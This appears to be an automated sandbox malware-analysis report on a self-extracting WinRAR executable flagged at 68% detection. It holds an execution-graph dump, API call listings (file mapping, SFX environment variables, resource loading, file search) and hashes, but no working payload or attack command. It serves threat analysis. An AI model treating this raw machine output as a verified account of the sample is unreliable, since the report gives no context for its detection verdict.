                                                                                                • Detection: 68%, ReversingLabs
                                                                                                Has exited:false

                                                                                                Target ID:44
                                                                                                Start time:01:57:31
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff6eef20000
                                                                                                File size:55'320 bytes
                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.6%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:9.3%
                                                                                                  Total number of Nodes:1512
                                                                                                  Total number of Limit Nodes:28
                                                                                                  execution_graph 25382 92b49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25417 919580 6 API calls 25443 91c793 102 API calls 4 library calls 25384 91c793 97 API calls 4 library calls 25419 91b18d 78 API calls 23449 91e5b1 23450 91e578 23449->23450 23452 91e85d 23450->23452 23478 91e5bb 23452->23478 23454 91e86d 23455 91e8ca 23454->23455 23466 91e8ee 23454->23466 23456 91e7fb DloadReleaseSectionWriteAccess 6 API calls 23455->23456 23457 91e8d5 RaiseException 23456->23457 23458 91eac3 23457->23458 23458->23450 23459 91e9d9 23465 91ea37 GetProcAddress 23459->23465 23472 91ea95 23459->23472 23460 91e966 LoadLibraryExA 23461 91e9c7 23460->23461 23462 91e979 GetLastError 23460->23462 23461->23459 23463 91e9d2 FreeLibrary 23461->23463 23464 91e9a2 23462->23464 23474 91e98c 23462->23474 23463->23459 23468 91e7fb DloadReleaseSectionWriteAccess 6 API calls 23464->23468 23467 91ea47 GetLastError 23465->23467 23465->23472 23466->23459 23466->23460 23466->23461 23466->23472 23476 91ea5a 23467->23476 23470 91e9ad RaiseException 23468->23470 23470->23458 23471 91e7fb DloadReleaseSectionWriteAccess 6 API calls 23473 91ea7b RaiseException 23471->23473 23487 91e7fb 23472->23487 23475 91e5bb ___delayLoadHelper2@8 6 API calls 23473->23475 23474->23461 23474->23464 23477 91ea92 23475->23477 23476->23471 23476->23472 23477->23472 23479 91e5c7 23478->23479 23480 91e5ed 23478->23480 23495 91e664 23479->23495 23480->23454 23482 91e5cc 23484 91e5e8 23482->23484 23498 91e78d 23482->23498 23503 91e5ee GetModuleHandleW GetProcAddress GetProcAddress 23484->23503 23486 91e836 23486->23454 23488 91e80d 23487->23488 23489 91e82f 23487->23489 23490 91e664 DloadReleaseSectionWriteAccess 3 API calls 23488->23490 23489->23458 23491 91e812 23490->23491 23492 91e82a 23491->23492 23493 91e78d DloadProtectSection 3 API calls 23491->23493 23506 91e831 GetModuleHandleW GetProcAddress 
GetProcAddress DloadReleaseSectionWriteAccess 23492->23506 23493->23492 23504 91e5ee GetModuleHandleW GetProcAddress GetProcAddress 23495->23504 23497 91e669 23497->23482 23499 91e7a2 DloadProtectSection 23498->23499 23500 91e7dd VirtualProtect 23499->23500 23501 91e7a8 23499->23501 23505 91e6a3 VirtualQuery GetSystemInfo 23499->23505 23500->23501 23501->23484 23503->23486 23504->23497 23505->23500 23506->23489 25420 91b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23715 91f3b2 23716 91f3be ___scrt_is_nonwritable_in_current_image 23715->23716 23747 91eed7 23716->23747 23718 91f3c5 23719 91f518 23718->23719 23722 91f3ef 23718->23722 23820 91f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23719->23820 23721 91f51f 23813 927f58 23721->23813 23725 91f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23722->23725 23758 928aed 23722->23758 23732 91f48f 23725->23732 23816 927af4 38 API calls _abort 23725->23816 23730 91f40e 23766 91f953 GetStartupInfoW _abort 23732->23766 23734 91f495 23767 928a3e 51 API calls 23734->23767 23736 91f49d 23768 91df1e 23736->23768 23741 91f4b1 23741->23721 23742 91f4b5 23741->23742 23743 91f4be 23742->23743 23818 927efb 28 API calls _abort 23742->23818 23819 91f048 12 API calls ___scrt_uninitialize_crt 23743->23819 23746 91f4c6 23746->23730 23748 91eee0 23747->23748 23822 91f654 IsProcessorFeaturePresent 23748->23822 23750 91eeec 23823 922a5e 23750->23823 23752 91eef1 23757 91eef5 23752->23757 23831 928977 23752->23831 23755 91ef0c 23755->23718 23757->23718 23759 928b04 23758->23759 23760 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23759->23760 23761 91f408 23760->23761 23761->23730 23762 928a91 23761->23762 23763 928ac0 23762->23763 23764 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23763->23764 23765 928ae9 23764->23765 23765->23725 23766->23734 23767->23736 23931 910863 23768->23931 23772 
91df3d 23980 91ac16 23772->23980 23774 91df46 _abort 23775 91df59 GetCommandLineW 23774->23775 23776 91dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23775->23776 23777 91df68 23775->23777 23995 904092 23776->23995 23984 91c5c4 23777->23984 23782 91dfe0 23989 91dbde 23782->23989 23783 91df76 OpenFileMappingW 23785 91dfd6 CloseHandle 23783->23785 23786 91df8f MapViewOfFile 23783->23786 23785->23776 23790 91dfcd UnmapViewOfFile 23786->23790 23792 91dfa0 __InternalCxxFrameHandler 23786->23792 23790->23785 23795 91dbde 2 API calls 23792->23795 23797 91dfbc 23795->23797 23796 9190b7 8 API calls 23798 91e0aa DialogBoxParamW 23796->23798 23797->23790 23799 91e0e4 23798->23799 23800 91e0f6 Sleep 23799->23800 23801 91e0fd 23799->23801 23800->23801 23804 91e10b 23801->23804 24028 91ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23801->24028 23803 91e12a DeleteObject 23805 91e146 23803->23805 23806 91e13f DeleteObject 23803->23806 23804->23803 23807 91e177 23805->23807 23808 91e189 23805->23808 23806->23805 24029 91dc3b 6 API calls 23807->24029 24025 91ac7c 23808->24025 23811 91e17d CloseHandle 23811->23808 23812 91e1c3 23817 91f993 GetModuleHandleW 23812->23817 24280 927cd5 23813->24280 23816->23732 23817->23741 23818->23743 23819->23746 23820->23721 23822->23750 23835 923b07 23823->23835 23827 922a6f 23828 922a7a 23827->23828 23849 923b43 DeleteCriticalSection 23827->23849 23828->23752 23830 922a67 23830->23752 23878 92c05a 23831->23878 23834 922a7d 7 API calls 2 library calls 23834->23757 23836 923b10 23835->23836 23838 923b39 23836->23838 23839 922a63 23836->23839 23850 923d46 23836->23850 23855 923b43 DeleteCriticalSection 23838->23855 23839->23830 23841 922b8c 23839->23841 23871 923c57 23841->23871 23844 922ba1 23844->23827 23846 922baf 23847 922bbc 23846->23847 23877 922bbf 6 API calls ___vcrt_FlsFree 23846->23877 23847->23827 23849->23830 23856 923c0d 23850->23856 23853 923d7e InitializeCriticalSectionAndSpinCount 23854 923d69 23853->23854 
23854->23836 23855->23839 23857 923c4f 23856->23857 23858 923c26 23856->23858 23857->23853 23857->23854 23858->23857 23863 923b72 23858->23863 23861 923c3b GetProcAddress 23861->23857 23862 923c49 23861->23862 23862->23857 23868 923b7e ___vcrt_FlsGetValue 23863->23868 23864 923bf3 23864->23857 23864->23861 23865 923b95 LoadLibraryExW 23866 923bb3 GetLastError 23865->23866 23867 923bfa 23865->23867 23866->23868 23867->23864 23869 923c02 FreeLibrary 23867->23869 23868->23864 23868->23865 23870 923bd5 LoadLibraryExW 23868->23870 23869->23864 23870->23867 23870->23868 23872 923c0d ___vcrt_FlsGetValue 5 API calls 23871->23872 23873 923c71 23872->23873 23874 923c8a TlsAlloc 23873->23874 23875 922b96 23873->23875 23875->23844 23876 923d08 6 API calls ___vcrt_FlsGetValue 23875->23876 23876->23846 23877->23844 23879 92c077 23878->23879 23882 92c073 23878->23882 23879->23882 23884 92a6a0 23879->23884 23880 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23881 91eefe 23880->23881 23881->23755 23881->23834 23882->23880 23885 92a6ac ___scrt_is_nonwritable_in_current_image 23884->23885 23896 92ac31 EnterCriticalSection 23885->23896 23887 92a6b3 23897 92c528 23887->23897 23889 92a6c2 23895 92a6d1 23889->23895 23910 92a529 29 API calls 23889->23910 23892 92a6cc 23911 92a5df GetStdHandle GetFileType 23892->23911 23893 92a6e2 _abort 23893->23879 23912 92a6ed LeaveCriticalSection _abort 23895->23912 23896->23887 23898 92c534 ___scrt_is_nonwritable_in_current_image 23897->23898 23899 92c541 23898->23899 23900 92c558 23898->23900 23921 9291a8 20 API calls _abort 23899->23921 23913 92ac31 EnterCriticalSection 23900->23913 23903 92c546 23922 929087 26 API calls _abort 23903->23922 23905 92c590 23923 92c5b7 LeaveCriticalSection _abort 23905->23923 23906 92c550 _abort 23906->23889 23907 92c564 23907->23905 23914 92c479 23907->23914 23910->23892 23911->23895 23912->23893 23913->23907 23915 92b136 _abort 20 API calls 23914->23915 23916 92c48b 23915->23916 23920 
92c498 23916->23920 23924 92af0a 23916->23924 23917 928dcc _free 20 API calls 23919 92c4ea 23917->23919 23919->23907 23920->23917 23921->23903 23922->23906 23923->23906 23925 92ac98 _abort 5 API calls 23924->23925 23926 92af31 23925->23926 23927 92af4f InitializeCriticalSectionAndSpinCount 23926->23927 23928 92af3a 23926->23928 23927->23928 23929 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23928->23929 23930 92af66 23929->23930 23930->23916 24030 91ec50 23931->24030 23934 9108e7 23936 910c14 GetModuleFileNameW 23934->23936 24041 9275fb 42 API calls 2 library calls 23934->24041 23935 910888 GetProcAddress 23937 9108a1 23935->23937 23938 9108b9 GetProcAddress 23935->23938 23947 910c32 23936->23947 23937->23938 23940 9108cb 23938->23940 23940->23934 23941 910b54 23941->23936 23942 910b5f GetModuleFileNameW CreateFileW 23941->23942 23943 910c08 CloseHandle 23942->23943 23944 910b8f SetFilePointer 23942->23944 23943->23936 23944->23943 23945 910b9d ReadFile 23944->23945 23945->23943 23948 910bbb 23945->23948 23950 910c94 GetFileAttributesW 23947->23950 23951 910cac 23947->23951 23953 910c5d CompareStringW 23947->23953 24032 90b146 23947->24032 24035 91081b 23947->24035 23948->23943 23952 91081b 2 API calls 23948->23952 23950->23947 23950->23951 23954 910cb7 23951->23954 23956 910cec 23951->23956 23952->23948 23953->23947 23957 910cd0 GetFileAttributesW 23954->23957 23959 910ce8 23954->23959 23955 910dfb 23979 91a64d GetCurrentDirectoryW 23955->23979 23956->23955 23958 90b146 GetVersionExW 23956->23958 23957->23954 23957->23959 23960 910d06 23958->23960 23959->23956 23961 910d73 23960->23961 23962 910d0d 23960->23962 23963 904092 _swprintf 51 API calls 23961->23963 23964 91081b 2 API calls 23962->23964 23965 910d9b AllocConsole 23963->23965 23966 910d17 23964->23966 23967 910df3 ExitProcess 23965->23967 23968 910da8 GetCurrentProcessId AttachConsole 23965->23968 23969 91081b 2 API calls 23966->23969 24046 923e13 23968->24046 23971 910d21 
23969->23971 24042 90e617 23971->24042 23972 910dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23972->23967 23975 904092 _swprintf 51 API calls 23976 910d4f 23975->23976 23977 90e617 53 API calls 23976->23977 23978 910d5e 23977->23978 23978->23967 23979->23772 23981 91081b 2 API calls 23980->23981 23982 91ac2a OleInitialize 23981->23982 23983 91ac4d GdiplusStartup SHGetMalloc 23982->23983 23983->23774 23985 91c5ce 23984->23985 23986 91c6e4 23985->23986 23987 911fac CharUpperW 23985->23987 24071 90f3fa 82 API calls 2 library calls 23985->24071 23986->23782 23986->23783 23987->23985 23990 91ec50 23989->23990 23991 91dbeb SetEnvironmentVariableW 23990->23991 23993 91dc0e 23991->23993 23992 91dc36 23992->23776 23993->23992 23994 91dc2a SetEnvironmentVariableW 23993->23994 23994->23992 24072 904065 23995->24072 23998 91b6dd LoadBitmapW 23999 91b70b GetObjectW 23998->23999 24000 91b6fe 23998->24000 24004 91b71a 23999->24004 24106 91a6c2 FindResourceW 24000->24106 24101 91a5c6 24004->24101 24006 91b770 24017 90da42 24006->24017 24007 91b74c 24122 91a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24007->24122 24008 91a6c2 13 API calls 24010 91b73d 24008->24010 24010->24007 24012 91b743 DeleteObject 24010->24012 24011 91b754 24123 91a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24011->24123 24012->24007 24014 91b75d 24124 91a80c 8 API calls 24014->24124 24016 91b764 DeleteObject 24016->24006 24135 90da67 24017->24135 24022 9190b7 24268 91eb38 24022->24268 24026 91acab GdiplusShutdown CoUninitialize 24025->24026 24026->23812 24028->23804 24029->23811 24031 91086d GetModuleHandleW 24030->24031 24031->23934 24031->23935 24033 90b15a GetVersionExW 24032->24033 24034 90b196 24032->24034 24033->24034 24034->23947 24036 91ec50 24035->24036 24037 910828 GetSystemDirectoryW 24036->24037 24038 910840 24037->24038 24039 91085e 24037->24039 24040 910851 LoadLibraryW 24038->24040 24039->23947 24040->24039 24041->23941 24043 90e627 24042->24043 24048 90e648 24043->24048 24047 
923e1b 24046->24047 24047->23972 24047->24047 24054 90d9b0 24048->24054 24051 90e645 24051->23975 24052 90e66b LoadStringW 24052->24051 24053 90e682 LoadStringW 24052->24053 24053->24051 24059 90d8ec 24054->24059 24056 90d9cd 24057 90d9e2 24056->24057 24067 90d9f0 26 API calls 24056->24067 24057->24051 24057->24052 24060 90d904 24059->24060 24066 90d984 _strncpy 24059->24066 24062 90d928 24060->24062 24068 911da7 WideCharToMultiByte 24060->24068 24065 90d959 24062->24065 24069 90e5b1 50 API calls __vsnprintf 24062->24069 24070 926159 26 API calls 3 library calls 24065->24070 24066->24056 24067->24057 24068->24062 24069->24065 24070->24066 24071->23985 24073 90407c __vswprintf_c_l 24072->24073 24076 925fd4 24073->24076 24079 924097 24076->24079 24080 9240d7 24079->24080 24081 9240bf 24079->24081 24080->24081 24083 9240df 24080->24083 24096 9291a8 20 API calls _abort 24081->24096 24085 924636 __cftof 38 API calls 24083->24085 24084 9240c4 24097 929087 26 API calls _abort 24084->24097 24087 9240ef 24085->24087 24098 924601 20 API calls 2 library calls 24087->24098 24088 9240cf 24090 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24088->24090 24092 904086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24090->24092 24091 924167 24099 9249e6 51 API calls 4 library calls 24091->24099 24092->23998 24095 924172 24100 9246b9 20 API calls _free 24095->24100 24096->24084 24097->24088 24098->24091 24099->24095 24100->24088 24125 91a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24101->24125 24103 91a5cd 24104 91a5d9 24103->24104 24126 91a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24103->24126 24104->24006 24104->24007 24104->24008 24107 91a6e5 SizeofResource 24106->24107 24108 91a7d3 24106->24108 24107->24108 24109 91a6fc LoadResource 24107->24109 24108->23999 24108->24004 24109->24108 24110 91a711 LockResource 24109->24110 24110->24108 24111 91a722 GlobalAlloc 24110->24111 24111->24108 24112 91a73d GlobalLock 24111->24112 24113 91a7cc 
GlobalFree 24112->24113 24114 91a74c __InternalCxxFrameHandler 24112->24114 24113->24108 24115 91a754 CreateStreamOnHGlobal 24114->24115 24116 91a7c5 GlobalUnlock 24115->24116 24117 91a76c 24115->24117 24116->24113 24127 91a626 GdipAlloc 24117->24127 24120 91a7b0 24120->24116 24121 91a79a GdipCreateHBITMAPFromBitmap 24121->24120 24122->24011 24123->24014 24124->24016 24125->24103 24126->24104 24128 91a645 24127->24128 24129 91a638 24127->24129 24128->24116 24128->24120 24128->24121 24131 91a3b9 24129->24131 24132 91a3e1 GdipCreateBitmapFromStream 24131->24132 24133 91a3da GdipCreateBitmapFromStreamICM 24131->24133 24134 91a3e6 24132->24134 24133->24134 24134->24128 24136 90da75 __EH_prolog 24135->24136 24137 90daa4 GetModuleFileNameW 24136->24137 24138 90dad5 24136->24138 24139 90dabe 24137->24139 24181 9098e0 24138->24181 24139->24138 24141 90db31 24192 926310 24141->24192 24145 90e261 78 API calls 24147 90db05 24145->24147 24146 90db44 24148 926310 26 API calls 24146->24148 24147->24141 24147->24145 24159 90dd4a 24147->24159 24156 90db56 ___vcrt_FlsGetValue 24148->24156 24149 90dc85 24149->24159 24228 909d70 81 API calls 24149->24228 24153 90dc9f ___std_exception_copy 24154 909bd0 82 API calls 24153->24154 24153->24159 24157 90dcc8 ___std_exception_copy 24154->24157 24156->24149 24156->24159 24206 909e80 24156->24206 24222 909bd0 24156->24222 24227 909d70 81 API calls 24156->24227 24157->24159 24176 90dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 24157->24176 24229 911b84 MultiByteToWideChar 24157->24229 24215 90959a 24159->24215 24160 90e159 24165 90e1de 24160->24165 24235 928cce 26 API calls 2 library calls 24160->24235 24162 90e16e 24236 927625 26 API calls 2 library calls 24162->24236 24164 90e214 24168 926310 26 API calls 24164->24168 24165->24164 24171 90e261 78 API calls 24165->24171 24167 90e1c6 24237 90e27c 78 API calls 24167->24237 24170 90e22d 24168->24170 24172 926310 26 API calls 24170->24172 24171->24165 24172->24159 24174 911da7 
WideCharToMultiByte 24174->24176 24176->24159 24176->24160 24176->24174 24230 90e5b1 50 API calls __vsnprintf 24176->24230 24231 926159 26 API calls 3 library calls 24176->24231 24232 928cce 26 API calls 2 library calls 24176->24232 24233 927625 26 API calls 2 library calls 24176->24233 24234 90e27c 78 API calls 24176->24234 24179 90e29e GetModuleHandleW FindResourceW 24180 90da55 24179->24180 24180->24022 24182 9098ea 24181->24182 24183 90994b CreateFileW 24182->24183 24184 90996c GetLastError 24183->24184 24187 9099bb 24183->24187 24238 90bb03 24184->24238 24186 90998c 24186->24187 24189 909990 CreateFileW GetLastError 24186->24189 24188 9099ff 24187->24188 24190 9099e5 SetFileTime 24187->24190 24188->24147 24189->24187 24191 9099b5 24189->24191 24190->24188 24191->24187 24193 926349 24192->24193 24194 92634d 24193->24194 24205 926375 24193->24205 24242 9291a8 20 API calls _abort 24194->24242 24196 926699 24198 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24196->24198 24197 926352 24243 929087 26 API calls _abort 24197->24243 24200 9266a6 24198->24200 24200->24146 24201 92635d 24202 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24201->24202 24203 926369 24202->24203 24203->24146 24205->24196 24244 926230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24205->24244 24207 909e92 24206->24207 24211 909ea5 24206->24211 24209 909eb0 24207->24209 24245 906d5b 77 API calls 24207->24245 24209->24156 24210 909eb8 SetFilePointer 24210->24209 24212 909ed4 GetLastError 24210->24212 24211->24209 24211->24210 24212->24209 24213 909ede 24212->24213 24213->24209 24246 906d5b 77 API calls 24213->24246 24216 9095be 24215->24216 24221 9095cf 24215->24221 24217 9095d1 24216->24217 24218 9095ca 24216->24218 24216->24221 24252 909620 24217->24252 24247 90974e 24218->24247 24221->24179 24223 909bdc 24222->24223 24224 909be3 24222->24224 24223->24156 24224->24223 24226 909785 GetStdHandle ReadFile GetLastError 
GetLastError GetFileType 24224->24226 24267 906d1a 77 API calls 24224->24267 24226->24224 24227->24156 24228->24153 24229->24176 24230->24176 24231->24176 24232->24176 24233->24176 24234->24176 24235->24162 24236->24167 24237->24165 24239 90bb10 _wcslen 24238->24239 24240 90bbb8 GetCurrentDirectoryW 24239->24240 24241 90bb39 _wcslen 24239->24241 24240->24241 24241->24186 24242->24197 24243->24201 24244->24205 24245->24211 24246->24209 24248 909781 24247->24248 24249 909757 24247->24249 24248->24221 24249->24248 24258 90a1e0 24249->24258 24253 90962c 24252->24253 24254 90964a 24252->24254 24253->24254 24256 909638 CloseHandle 24253->24256 24255 909669 24254->24255 24266 906bd5 76 API calls 24254->24266 24255->24221 24256->24254 24259 91ec50 24258->24259 24260 90a1ed DeleteFileW 24259->24260 24261 90a200 24260->24261 24262 90977f 24260->24262 24263 90bb03 GetCurrentDirectoryW 24261->24263 24262->24221 24264 90a214 24263->24264 24264->24262 24265 90a218 DeleteFileW 24264->24265 24265->24262 24266->24255 24267->24224 24271 91eb3d ___std_exception_copy 24268->24271 24269 9190d6 24269->23796 24271->24269 24273 91eb59 24271->24273 24277 927a5e 7 API calls 2 library calls 24271->24277 24272 91f5c9 24279 92238d RaiseException 24272->24279 24273->24272 24278 92238d RaiseException 24273->24278 24275 91f5e6 24277->24271 24278->24272 24279->24275 24281 927ce1 _abort 24280->24281 24282 927cfa 24281->24282 24283 927ce8 24281->24283 24304 92ac31 EnterCriticalSection 24282->24304 24316 927e2f GetModuleHandleW 24283->24316 24286 927ced 24286->24282 24317 927e73 GetModuleHandleExW 24286->24317 24287 927d01 24291 927d76 24287->24291 24301 927d9f 24287->24301 24325 9287e0 20 API calls _abort 24287->24325 24295 927d8e 24291->24295 24300 928a91 _abort 5 API calls 24291->24300 24293 927de8 24326 932390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24293->24326 24294 927dbc 24308 927dee 24294->24308 24296 928a91 _abort 5 API calls 24295->24296 24296->24301 24300->24295 
90a095 24544 906e98 77 API calls 24540->24544 24542->24533 24542->24536 24542->24537 24542->24538 24542->24540 24543 906baa 78 API calls 24542->24543 24543->24542 24544->24533 25457 928268 55 API calls _free 25416 91c793 107 API calls 4 library calls 25480 927f6e 52 API calls 3 library calls

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 00910863: GetModuleHandleW.KERNEL32(kernel32), ref: 0091087C
                                                                                                    • Part of subcall function 00910863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0091088E
                                                                                                    • Part of subcall function 00910863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009108BF
                                                                                                    • Part of subcall function 0091A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0091A655
                                                                                                    • Part of subcall function 0091AC16: OleInitialize.OLE32(00000000), ref: 0091AC2F
                                                                                                    • Part of subcall function 0091AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0091AC66
                                                                                                    • Part of subcall function 0091AC16: SHGetMalloc.SHELL32(00948438), ref: 0091AC70
                                                                                                  • GetCommandLineW.KERNEL32 ref: 0091DF5C
                                                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0091DF83
                                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0091DF94
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0091DFCE
                                                                                                    • Part of subcall function 0091DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0091DBF4
                                                                                                    • Part of subcall function 0091DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0091DC30
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0091DFD7
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,0095EC90,00000800), ref: 0091DFF2
                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,0095EC90), ref: 0091DFFE
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0091E009
                                                                                                  • _swprintf.LIBCMT ref: 0091E048
                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0091E05A
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0091E061
                                                                                                  • LoadIconW.USER32(00000000,00000064), ref: 0091E078
                                                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0091E0C9
                                                                                                  • Sleep.KERNEL32(?), ref: 0091E0F7
                                                                                                  • DeleteObject.GDI32 ref: 0091E130
                                                                                                  • DeleteObject.GDI32(?), ref: 0091E140
                                                                                                  • CloseHandle.KERNEL32 ref: 0091E183
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                  • API String ID: 3049964643-3743209390
                                                                                                  • Opcode ID: 526211ed471f5bf31605e113f04231f87384cb1bf22713079d0d8d8a2b7ff238
                                                                                                  • Instruction ID: e6ab0039c85b250b5ad972d05a9fe06b63a2eb3388233741c70264b0f1ace5f5
                                                                                                  • Opcode Fuzzy Hash: 526211ed471f5bf31605e113f04231f87384cb1bf22713079d0d8d8a2b7ff238
                                                                                                  • Instruction Fuzzy Hash: 59613B7565C308BFD320ABB1EC49FAB77ECEB89705F000429F945921A1DB789E84DB61

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Control-flow graph for 91a6c2-91a7e1 (node and edge listing omitted; subcalls to 920320 and 91a626). The APIs it calls are listed under APIs below.
                                                                                                  APIs
                                                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0091B73D,00000066), ref: 0091A6D5
                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A6EC
                                                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A703
                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A712
                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0091B73D,00000066), ref: 0091A72D
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0091A73E
                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0091A762
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0091A7C6
                                                                                                    • Part of subcall function 0091A626: GdipAlloc.GDIPLUS(00000010), ref: 0091A62C
                                                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0091A7A7
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0091A7CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                  • String ID: PNG
                                                                                                  • API String ID: 211097158-364855578
                                                                                                  • Opcode ID: 5770f1457157d10a12dc93733834fc3935b4f4b5196ccbe622ee9600f3634056
                                                                                                  • Instruction ID: bc49977a7f7017fe45d7f0426ec18a418089679dc574705fc87201b6ded4674f
                                                                                                  • Opcode Fuzzy Hash: 5770f1457157d10a12dc93733834fc3935b4f4b5196ccbe622ee9600f3634056
                                                                                                  • Instruction Fuzzy Hash: DD31C275A49306AFC7109F61EC88D6B7BBCEF85761B004519F805C2261EB31DE84EEA1

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Control-flow graph for 90a69b-90a811 (node and edge listing omitted; subcalls to 91ec50, 90bb03, 910602, 90c310 and 9115da). The APIs it calls (FindFirstFileW, FindNextFileW, GetLastError) are listed under APIs below.
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6C4
                                                                                                    • Part of subcall function 0090BB03: _wcslen.LIBCMT ref: 0090BB27
